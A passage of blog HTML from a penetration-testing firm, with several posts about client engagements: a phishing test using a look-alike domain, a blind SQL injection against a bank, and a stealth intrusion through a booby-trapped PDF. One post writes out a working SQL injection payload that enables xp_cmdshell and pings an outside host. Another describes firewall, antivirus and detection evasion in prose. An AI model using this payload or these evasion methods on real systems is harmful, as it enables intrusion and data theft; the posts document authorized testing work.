href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiij23ZFrgWtV_TjErUheM2Joa7Rl9hVh6fdv4310G4n3DP3JgvaU_lMib7_aCxf5dKPOAwx35X8l8BSWO4b8_nsTN5My06iL1wVs3HM2R7eM_DfLiHMEz_H-gg_7wOrHWToDx2obE_awI/s1600/Screen+shot+2010-06-14+at+8.01.38+PM.png"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 287px; height: 323px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiij23ZFrgWtV_TjErUheM2Joa7Rl9hVh6fdv4310G4n3DP3JgvaU_lMib7_aCxf5dKPOAwx35X8l8BSWO4b8_nsTN5My06iL1wVs3HM2R7eM_DfLiHMEz_H-gg_7wOrHWToDx2obE_awI/s400/Screen+shot+2010-06-14+at+8.01.38+PM.png" alt="" id="BLOGGER_PHOTO_ID_5482785212908080706" border="0" /></a>This is akin to how armor is tested. Armor is designed to protect something from a specific threat. In order to be effective, the armor is exposed to a level of threat that is slightly higher than what it will likely face in the real world. If the armor is penetrated during testing, it is enhanced and hardened until the threat cannot defeat the armor. If armor is penetrated in battle then there are casualties. That class of testing is called Penetration Testing and the level of threat produced has a very significant impact on test quality and results.<br /><br />What is particularly scary is that many of the security vendors who offer Penetration Testing services either don't know what Penetration Testing is or don’t know the definitions for the terms. Many security vendors confuse Penetration Testing with Vulnerability Assessments and that confusion translates to the customer. The terms are not interchangeable and they do not define methodology, they only define testing class. So before we can explain service quality and threat, we must first properly define services.<br /><br />Based on the English dictionary the word “Vulnerability” is best defined as susceptibility to harm or attack. Being vulnerable is the state of being exposed. The word “Assessment” is best defined as the means by which the value of something is estimated or determined usually through the process of testing. As such, a “Vulnerability Assessment” is a best estimate as to how susceptible something is to harm or attack.<br /><br />Lets do the same for “Penetration Test”. The word “Penetration” is best defined as the act of entering into or through something, or the ability to make way into or through something. The word “Test” is best defined as the means by which the presence, quality or genuineness of anything is determined. As such the term “Penetration Test” means to determine the presence of points where something can make its way through or into something else.<br /><br />Despite what many people think, neither term is specific to Information Technology. Penetration Tests and Vulnerability Assessments existed well before the advent of the microchip. In fact, the ancient Romans used a form of penetration testing to test their armor against various types of projectiles. Today, we perform Structural Vulnerability Assessments against things like the Eiffel Tower, and the Golden Gate Bridge. Vulnerability Assessments are chosen because Structural Penetration Tests would cause damage to, or possibly destroy the structure.<br /><br />In the physical world Penetration Testing is almost always destructive (at least to a degree), but in the digital world it isn’t destructive when done properly. This is mostly because in the digital world we’re penetrating a virtual boundary and in the physical world we’re penetrating a physical boundary. When you penetrate a virtual boundary you’re not really creating a hole, you’re usually creating a process in memory that can be killed or otherwise removed. <br /><br />When applied to IT Security, a Vulnerability Assessment isn't as accurate as a Penetration Test. This is because Vulnerability Assessments are best estimates and Penetration Tests either penetrate or they don’t. As such, a quality Vulnerability Assessment report will contain few false positives (false findings) while a quality Penetration Testing report should contain absolutely no false positives. (though they do sometimes contain theoretical findings).<br /><br />The quality of service is determined by the talent of the team delivering services and by the methodology used for service delivery. A team of research capable ethical hackers that have a background in exploit development and system / network penetration will usually deliver higher quality services than a team of people who are not research capable. If a team claims to be research capable, ask them for example exploit code that they’ve written and ask them for advisories that they’ve published.<br /><br />Service quality is also directly tied to threat capability. The threat in this case is defined by the capability of real world malicious hackers. If testing services do not produce a threat level that is at least equal to the real world threat, then the services are probably not worth buying. After all, the purpose for security testing is to identify risks so that they can be fixed / patched / eliminated before malicious hackers exploit them. But if the security testing services are less capable than the malicious hacker, then chances are the hacker will find something that the service missed.<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-58443820275342462522010-06-11T11:29:00.000-07:002010-06-11T11:54:11.303-07:00We Are Politically Incorrect<div style="text-align: center;"><br /></div><div style="text-align: left;">Back in February of 2009 we released an article called <a href="http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html">FaceBook from the hackers perspective</a>.<span style="mso-spacerun: yes"> </span>As far as we know, we were the first to publish a detailed article about using Social Networking Websites to deliver surgical Social Engineering attacks. Since that time, we noticed a significant increase in marketing hype around Social Engineering from various other security companies. The problem is that they're not telling you the whole truth.</div><p class="MsoNormal"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 366px; height: 103px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg64p6eSQhHgAmWJzgwYf0NgJMTBDchykY1G2qiHf0m_9c3jEOnUQxHEpn1yXKQ4RqFjSX0sjctt-JXldiqX2mk8ijmO-uaQzkG-9EktGW6E0H7hLGDy70jb1B-YOUfwsFlTzETZrOoXYs/s400/Screen+shot+2010-06-11+at+2.31.53+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5481585837192092850" /></p><p class="MsoNormal">The whole truth is that Social Engineering is a necessary but potentially dangerous service.<span style="mso-spacerun: yes"> </span>Social Engineering at its roots is the act of exploiting the human vulnerability and as such is an offensive and <a href="http://en.wikipedia.org/wiki/Politically_Incorrect">politically incorrect</a> service.<span style="mso-spacerun: yes"> </span>If a customer’s business has any pre-existing social or political issues then Social Engineering can be like putting a match to a powder keg.<span style="mso-spacerun: yes"> </span>In some cases the damages can be serious and can result in legal action between employee and employer, or visa versa.</p><p class="MsoNormal"><span style="mso-spacerun: yes">It’s for this reason that businesses need to make sure that their environments are conducive to receiving social attacks, and that they are prepared to deal with the emotional consequences that might follow.<span style="mso-spacerun: yes"> </span>If employees are trained properly and if security policies are enforced that cover the social vector, then things “should” be ok. If those policies don’t exist and if there’s any internal turmoil, high-risk employees, or potentially delicate political situations, then Social Engineering is probably not such a great idea as it will likely identify and exploit one of those pre-existing issues.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">For example, we recently delivered services to a customer that had pre-existing issues but assumed that their environment was safe for testing with Social Engineering.<span style="mso-spacerun: yes"> </span>In this particular case the customer had an employee that we’ll call Jane Doe who was running her own business on the side.<span style="mso-spacerun: yes"> </span>Jane Doe was advertising her real employers name on her business website making it appear as if there was a relationship between her employer and her business.<span style="mso-spacerun: yes"> </span>She was also advertising her business address as her employers address on her FaceBook fan page.<span style="mso-spacerun: yes"> </span>From our perspective, Jane Doe was a perfect Social Engineering target.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">With this social risk identified, we decided that we’d impersonate Jane Doe and hijack the existing relationships that she had with our customer (her employer).<span style="mso-spacerun: yes"> </span>We accomplished this with a specially crafted phishing attack.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">The first step in the phish was to collect content for the phishing email.<span style="mso-spacerun: yes"> </span>In this case Jane Doe posted images to her FaceBook fan page that included a photo of herself and a copy of her businesses logo. We used those images to create an email that looked like it originated from Jane Doe’s email address at our customers network and was offering the recipient discounted pricing. (Her FaceBook privacy settings were set to allow everybody.)</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">Once we had the content for the phishing email set up we used an </span><span><a href="http://en.wikipedia.org/wiki/IDN_homograph_attack">IDN homograph attack </a></span><span style="mso-spacerun: yes">to register a new domain that appeared to be identical to our customers domain.<span style="mso-spacerun: yes"> </span>For example, if our customer was SNOsoft and their real domain was snosoft.com, the fake domain looked just like “snosoft.com”.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">We embedded a link into the phishing email using the fake domain to give it a legitimate look and feel.<span style="mso-spacerun: yes"> </span>The link was advertised as the place to click to get information about specially discounted offerings that were specific to our customer’s employees.<span style="mso-spacerun: yes"> </span>Of course, the link really pointed to our web server where we were hosting a </span><span><a href="http://www.snosoft.com/pwnt.html">browser based exploit</a></span><span style="mso-spacerun: yes">.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">Then we collected email addresses using an enumerator and loaded those into a distribution list.<span style="mso-spacerun: yes"> </span>We sent a test email to ourselves first to make sure that everything would render ok.<span style="mso-spacerun: yes"> </span>Once our testing was complete, we clicked send and the phish was on its way.<span style="mso-spacerun: yes"> </span>Within 15 minutes of delivering the attack our customer called us and requested that all testing be stopped.<span style="mso-spacerun: yes"> </span>But by that time, 38 people had already clicked on our embedded URL, and more clicks were on their way.</span></p><p class="MsoNormal"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 286px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht2mZFuOiO0lYPvi-1fmUljR8BgAGkfGw18_B9LpDLGpJYmDA2VLNAKkHwTCrXWq5lQ-Gld5cKP3pRCnFTCiCXsQ-GVs27YuWAWB-6spBLuYGO2yyQ2h89WbMTLzsIcHNeHOOHp1JNaxY/s400/Screen+shot+2010-06-11+at+2.36.03+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5481586981584125570" /></p><p class="MsoNormal"><span style="mso-spacerun: yes">As it turns out, our customer wasn’t prepared to receive Social Engineering tests despite the fact that they requested them.<span style="mso-spacerun: yes"> </span>At first they accused us of being unprofessional because we used Jane Doe’s picture in the phishing email, which was apparently embarrassing to Jane Doe.<span style="mso-spacerun: yes"> </span>Then they accused us of being politically incorrect for the same reason.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">So we asked our customer, <span style="mso-spacerun: yes"> </span>“Do you think that a black-hat would refrain from doing this because it’s politically incorrect?”<span style="mso-spacerun: yes"> </span>Then we said, “Imagine if a black-hat launched this attack, and received 38 clicks (and counting).” (Each click representing a potential compromise).</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">While we can’t go into much more detail for reasons of confidentiality, the phishing attack uncovered other more serious internal and political issues.<span style="mso-spacerun: yes"> </span>Because of those issues, we had to discontinue testing and move to report delivery.<span style="mso-spacerun: yes"> </span>There was no fault or error on our part as everything was requested and authorized by the customer, but this was certainly a case of the match and the powder keg.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">Despite the unfortunate circumstances, the customer did benefit significantly from the services.<span style="mso-spacerun: yes"> </span>Specifically, the customer became aware of some very serious social risks that would have been extremely damaging had they been identified and exploited by black-hat hackers.<span style="mso-spacerun: yes"> </span>Even if it was a painful process for the customer, we’re happy that we were able to deliver the services as we did because they enabled our customer to reduce their overall risk and exposure profile.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes"> The moral of the story is that businesses should take care and caution when requesting Social Engineering services.<span style="mso-spacerun: yes"> </span>They should be prepared for uncomfortable situations and discoveries, and if possible they should train and prepare their employees in advance.<span style="mso-spacerun: yes"> </span>In the end it boils down to one of two things.<span style="mso-spacerun: yes"> </span>Is it more important for a company to understand their risks or is it more important to avoid embarrassing or offending an employee. </span></p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-86910475990955659702010-05-16T21:55:00.000-07:002010-05-16T22:22:27.150-07:00REVERSE(noitcejnI LQS dnilB) Bank HackingEarlier this year we were hired to perform an Overt <a href="http://www.netragard.com/services_webassess.php">Web Application Penetration Test</a> for <a href="http://www.snosoft.com/hacked-2.html">one of our banking customers</a> (did you click that?).<span style=""> </span>This customer is a reoccurring customer and so we know that they have<a href="http://www.owasp.org/index.php/Web_Application_Firewall"> Web Application Firewalls </a>and <a href="http://en.wikipedia.org/wiki/Intrusion_prevention_system">Network Intrusion Prevention Systems</a> in play.<span style=""> </span>We also know that they are very security savvy and that they respond to attacks promptly and appropriately.<br /><p class="MsoNormal"><br /></p><p class="MsoNormal"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikEUskQIKXTLcirH3mhe8swVY48-4lyXOcy5kvVwiignNq_XLEaDhl5hWTGKVp3Pfy_9tJa_ExKiNlqONA50N5nU2Y9Lr85SG2zVAwA1BBfreiz4fSlz-alSuMBGGmz3z0a6njwm6L4m0/s1600/ear0874l.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 346px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikEUskQIKXTLcirH3mhe8swVY48-4lyXOcy5kvVwiignNq_XLEaDhl5hWTGKVp3Pfy_9tJa_ExKiNlqONA50N5nU2Y9Lr85SG2zVAwA1BBfreiz4fSlz-alSuMBGGmz3z0a6njwm6L4m0/s400/ear0874l.jpg" alt="" id="BLOGGER_PHOTO_ID_5472098542230302178" border="0" /></a></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Because this test was Overt in nature (non-stealth) we began testing by configuring <a href="http://www.acunetix.com/">Acunetix</a> to use <a href="http://portswigger.net/suite/pro.html">burpsuite-pro</a> as a proxy.<span style=""> </span>Then we ran an automated Web Application Vulnerability Scan with Acunetix and watched the scan populate burpsuite-pro with information. <span style=""> </span>While the scan results were mostly fruitless we were able to pick up with manual testing and burpsuite-pro.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">While the automated scans didn’t find anything our manual testing identified an interesting <a href="http://en.wikipedia.org/wiki/SQL_injection">Blind SQL Injection Vulnerability</a>.<span style=""> </span>This blind SQL Injection vulnerability was the only vulnerability that we discovered that had any real potential.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">It’s important understand to the difference between standard SQL Injection Vulnerabilities and Blind SQL Injection Vulnerabilities.<span style=""> </span>A standard SQL Injection Vulnerability will return useful error information to the attacker and usually display that information in the attackers web browser.<span style=""> </span>That information helps the attacker debug and refine the attack.<span style=""> </span>Blind SQL Injection Vulnerabilities return nothing, making them much more difficult to exploit.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Since the target Web Application was protected by two different Intrusion Prevention Technologies, and since the vulnerability was a Blind SQL Injection Vulnerability, we knew that exploitation wasn’t going to be easy.<span style=""> </span>To be successful we’d first need to defeat the Network Intrusion Prevention System and then the Web Application Firewall. </p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Defeating Network Intrusion Prevention Systems is usually fairly easy.<span style=""> </span>The key is to find an attack vector that the Network Intrusion Prevention System can’t monitor.<span style=""> </span>In this case (like most cases) our Web Application’s server accepted connections over SSL (via HTTPS).<span style=""> </span>Because SSL based traffic is encrypted the Network Intrusion Prevention System can’t intercept and analyze the traffic.<span style=""> </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Defeating Web Application Firewalls is a bit more challenging.<span style=""> </span>In this case, the Web Application Firewall was the termination point for the SSL traffic and so it didn’t suffer from the same SSL blindness issues that the Network Intrusion Prevention System did.<span style=""> </span>In fact, the Web Application Firewall was detecting and blocking our embedded SQL commands very successfully.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">We tried some of the known techniques for bypassing Web Application Firewalls but to no avail. <span style=""> </span>The vendor that makes this particular Web Application Firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies. <span style=""> </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Then we decided that we’d try attacking backwards. Most SQL databases support a reverse function. That function does just what you’d think that it would do; it returns the reverse of whatever string you feed it.<span style=""> </span>So we wrote our commands backwards and encapsulated then in the reverse() function provided by the SQL server.<span style=""> </span>When we fed our new reversed payloads to the Web Application the Web Application Firewall failed to block the commands.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">As it turns out most (maybe all) Web Application Firewalls can be bypassed if you reverse the spelling of your SQL commands. So you’d rewrite “xp_cmdshell” as “llehsdmc_px” and then encapsulate it in the reverse function.<span style=""> </span>As far as we know we’re the first to discover and use this method to successfully bypass a Web Application Firewall.<span style=""> </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">The next step in the attack was to reconfigure and enable the xp_cmdshell function. The xp_cmdshell is important as it executes a given command string as an operating-system command shell and returns any output rows of text.<span style=""> </span>Simply put, it’s just like sitting at the DOS prompt. </p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">The technique used to reconfigure the xp_cmdshell functionality is well known and well documented.<span style=""> </span>But, since we did it using backwards commands we thought that we would show you what it looked like.<span style=""> </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p style="font-weight: bold;" class="MsoNormal"><span style="font-size:85%;">var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--</span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">The above SQL commands do the following three things:</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style="font-weight: bold;">1-) C:\> show advanced options, 1 \n</span><span style=""> </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style="font-size:85%;">Use the “<span style="">show advanced options”</span> option to display the <span style="">sp_configure</span> system stored procedure advanced options. When you set <span style="">show advanced options</span> to 1, you can list the advanced options by using <span style="">sp_configure</span>. The default is 0. The setting takes effect immediately without a server restart.</span></p> <p class="MsoNormal"><o:p> </o:p></p> <p style="font-weight: bold;" class="MsoNormal">2-) C:\> <a href="http://www.google.com/search?hl=en&safe=off&client=safari&rls=en&ei=47XwS4-NIoS0lQeLluG1CA&sa=X&oi=spell&resnum=0&ct=result&cd=1&ved=0CCQQBSgA&q=master.dbo.sp_configure+xp_cmdshell,+1&spell=1"><span style="text-decoration: none; color: rgb(0, 0, 0);">master.dbo.sp_configure xp_cmdshell, 1</span></a></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style="font-size:85%;">This enables the xp_cmdshell functionality in the MsSQL database so that we can execute operating-system commands by calling xp_cmdshell. </span><span style="font-size:85%;"> </span><span style="font-size:85%;">xp_cmdshell is disabled by default. </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p style="font-weight: bold;" class="MsoNormal">3-) C:\> ping netragard.com</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style="font-size:85%;">Because we were dealing with a Blind SQL Injection Vulnerability we needed a creative way to test that we’d successfully re-enabled the xp_cmdshell function.</span><span style="font-size:85%;"> </span><span style="font-size:85%;">To do that we set up a sniffer on our outside firewall interface and configured it to alert us when we received pings from our banking customer’s network.</span><span style="font-size:85%;"> </span><span style="font-size:85%;">Then in the SQL payload (shown above) we included the command “ping netragard.com”.</span><span style="font-size:85%;"> </span><span style="font-size:85%;">Then when we received ICMP packets from our customers network we knew that our command had been executed successfully.</span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Now that we had confirmed that our Blind Reversed SQL Injection attack was viable and that we had successfully enabled the xp_cmdshell functionality,<span style=""> </span>the last thing for us to do was to extract database information.<span style=""> </span>But how do we extract database information using a Blind SQL Injection Vulnerability if the vulnerability never returns any information?</p> <p class="MsoNormal"><o:p> </o:p></p>That's actually pretty easy. Most databases support conditional statements (if condition then do something). So, we used conditional statements combined with timing to extract database information. Specifically, if table name equals "users" then wait for 3 seconds, if it doesn't then return control immediately. Then if the database doesn't respond for 3 seconds we know that we've guessed the name of one of the tables correctly.<br /><br />Sure there are other things that we could have done, but we're the good guys.<br /><br /><p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style=""> </span></p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com5tag:blogger.com,1999:blog-422477430134849438.post-8237726367276358732010-04-26T16:54:00.000-07:002011-03-06T22:20:13.799-08:00Netragard Hacking Your Bank<div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxdTN_WbGa67nPH-JepwQGTQHVekX3P5xV1sDGh_T48p-xE9w6Cp8Fond7ykuA1Yhk1nNWe1d4muYUlwmPF590wnWLC77EfKeVWQye4oKzCghgk3PftcaK3idR7oqpRgXnCzUB12jvIX4/s400/aton971l.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 0px; height: 0px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxdTN_WbGa67nPH-JepwQGTQHVekX3P5xV1sDGh_T48p-xE9w6Cp8Fond7ykuA1Yhk1nNWe1d4muYUlwmPF590wnWLC77EfKeVWQye4oKzCghgk3PftcaK3idR7oqpRgXnCzUB12jvIX4/s400/aton971l.jpg" border="0" alt="" /></a></div><div style="text-align: left;">We were recently hired to perform an interesting Advanced Stealth Penetration test for a mid-sized bank.<span style="mso-spacerun: yes"> </span>The goal of the penetration test was to penetrate into the bank’s IT Infrastructure and see how far we could get without detection.<span style="mso-spacerun: yes"> </span>This is a bit different than most penetration tests as we weren’t tasked with identifying risks as much as we were with demonstrating vulnerability.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbG0mJHh-Cst71wYGrl2Rp3jSwKBrTW8n7LbbgZFkP0etqkUiE5s-kgh1NlYtglVDWYViViqc8MrzElKK5Y5a8p8bGv2j1UjtLm_Df6Bt-TShxP23tjKUieusnJyGhS8rI61HxWcc5_Ag/s400/aton971l.jpg" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 364px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5581218867226253234" /></div><p class="MsoNormal"></p> <p class="MsoNormal"><o:p>The first step of any penetration test is reconnaissance.<span style="mso-spacerun: yes"> </span>Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy.<span style="mso-spacerun: yes"> </span>It is technically impossible to effectively attack an enemy without first obtaining actionable intelligence about the enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage and a completely failed attack.<span style="mso-spacerun: yes"> </span>In penetration testing, damages are realized by downed systems and a loss of revenue.</o:p></p> <p class="MsoNormal">Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance.<span style="mso-spacerun: yes"> </span>We first targeted FaceBook with our “<a href="http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html">FaceBook from the hackers perspective</a>“ methodology.<span style="mso-spacerun: yes"> </span>That enabled us to map relationships between employees, vendors, friends, family etc.<span style="mso-spacerun: yes"> </span>It also enabled us to identify key people in Accounts Receivable / Accounts Payable (“AR/AP”). </p> <p class="MsoNormal"><o:p>In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT related job openings that disclosed interesting and useful technical information about the bank.<span style="mso-spacerun: yes"> </span>That information included but was not limited to what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.<span style="mso-spacerun: yes"> </span></o:p></p> <p class="MsoNormal">Naturally, we thought that it was also a good idea to apply for the job to see what else we could learn.<span style="mso-spacerun: yes"> </span>To do that, we created a fake resume that was designed to be the “perfect fit” for a “Sr. IT Security Position” (one of the opportunities available).<span style="mso-spacerun: yes"> </span>Within one day of submission of our fake resume, we had a telephone screening call scheduled.<span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal">We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity.<span style="mso-spacerun: yes"> </span>Once we felt that the conversation was flowing smoothly, we began to dig in a bit and start asking various technology questions.<span style="mso-spacerun: yes"> </span>In doing so, we learned what Anti-Virus technologies were in use and we also learned what the policies were for controlling outbound network traffic.<span style="mso-spacerun: yes"> </span></p> <p class="MsoNormal">That’s all that we needed…</p> <p class="MsoNormal">Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. <span style="mso-spacerun: yes"> </span>In summary we learned:</p><p class="MsoNormal"></p><ul><li><span style="font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:Symbol;"><span style="mso-list:Ignore"><span style="font:7.0pt "Times New Roman""> </span></span></span>That the bank uses Windows XP for most Desktops</li><li>Who some of the bank’s vendors were (IT Services)</li><li><span style="font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:Symbol;"><span style="mso-list:Ignore"><span style="font:7.0pt "Times New Roman""> </span></span></span>The names and email addresses of people in AR/AP</li><li>What Anti-Virus technology the bank uses</li><li>Information about the banks traffic control policies </li></ul><p></p> <p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">Based on the intelligence that we collected we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF document to the bank’s AR/AP department from the banks trusted IT Services provider.<span style="mso-spacerun: yes"> </span>This attack was designed to exploit the trust that our customer had with their existing IT Services provider. </p> <p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto"><o:p>When we created the PDF, we used the new reverse <a href="http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html">https payload</a> that was recently released by the <a href="http://www.metasploit.com/">Metasploit</a> Project.<span style="mso-spacerun: yes"> </span>(Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS).<span style="mso-spacerun: yes"> </span>We like reverse HTTPS connections for two reasons:</o:p></p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto"></p><ul><li>First, Intrusion Detection Technologies cannot monitor encrypted network traffic.<span style="mso-spacerun: yes"> </span>Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.</li><li><span style="font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:Symbol;"><span style="mso-list:Ignore"><span style="font:7.0pt "Times New Roman""> </span></span></span>Second, most companies allow outbound HTTPS (port 443) because its required to view many websites.<span style="mso-spacerun: yes"> </span>The reverse HTTPS payload that we used mimics normal web browsing behavior and so is much less likely to set off any Intrusion Detection events.</li></ul>Before we sent the PDF to the our customer we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus.<span style="mso-spacerun: yes"> </span>To evade the scanners we had to “<a href="http://polypack.eecs.umich.edu/">pack</a>” our pseudo-malware in such a way that it would not be detected by the scanners.<span style="mso-spacerun: yes"> </span>Once that was done and tested, we were ready to launch our attack.<p></p><p class="MsoNormal">When we sent the PDF to our customer, it didn’t take long for the victim in AP/AR to open it, after all it appeared to be a trusted invoice.<span style="mso-spacerun: yes"> </span>Once it was opened, the victim’s computer was compromised.<span style="mso-spacerun: yes"> </span>That resulted in it establishing a reverse connection to our lab which we then tunneled into to take control of the victims computer (all via HTTPS).<span style="mso-spacerun: yes"> </span></p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto"><span style="mso-spacerun: yes">Once we had control, our first order of operation was to maintain access.<span style="mso-spacerun: yes"> </span>To do this we installed our own backdoor technology onto the victims computer.<span style="mso-spacerun: yes"> </span>Our technology also used outbound HTTPS connections, but for authenticated command retrieval.<span style="mso-spacerun: yes"> </span>So if our control connection to the victims computer was lost, we could just tell our backdoor to re-establish the connection.</span></p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">The next order of operation was to deploy our suite of tools on the compromised system and to begin scoping out the internal network.<span style="mso-spacerun: yes"> </span>We used selective ARP poisoning as a first method for performing internal reconnaissance.<span style="mso-spacerun: yes"> </span>That proved to be very useful as we were able to quickly identify VNC connections and capture VNC authentication packets.<span style="mso-spacerun: yes"> </span>As it turns out, the VNC connections that we captured were being made to the Active Directory (“AD”) server.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">We were able to crack the VNC password by using a VNC Cracking Tool.<span style="mso-spacerun: yes"> </span>Once that happened we were able to access, the AD server and extract the servers SAM file. We then successfully cracked all of the passwords in that file, including the historical user passwords.<span style="mso-spacerun: yes"> </span>Once the passwords were cracked, we found that the same credentials were used across multiple systems.<span style="mso-spacerun: yes"> </span>As such, we were not only able to access desktops and servers, but also able to access Cisco devices, etc.<span style="mso-spacerun: yes"> </span></p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto"><span style="mso-spacerun: yes">In summary, we were able to penetrate into our customers IT Infrastructure and effectively take control of the entire infrastructure without being detected.<span style="mso-spacerun: yes"> </span>We accomplished that by avoiding conventional methods for penetration and by using our own unorthodox yet obviously effective penetration methodologies.</span></p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">This particular engagement was interesting as our customers goal was not to identify all points of risk, but instead was to identify how deeply we could penetrate.<span style="mso-spacerun: yes"> </span>Since the engagement, we’ve worked with that customer to help them create barriers for isolation in the event of penetration.<span style="mso-spacerun: yes"> </span>Since those barriers have been implemented, we haven’t been able to penetrate as deeply.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">As usual, if you have any questions or comments, please leave them on our blog.<span style="mso-spacerun: yes"> </span>If there’s anything you’d like us to write about, please email me the suggestion.<span style="mso-spacerun: yes"> </span><span style="mso-spacerun: yes"> </span>If I’ve made a grammatical mistake in here… I’m a hacker not an English major.<span style="mso-spacerun: yes"> </span></p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel 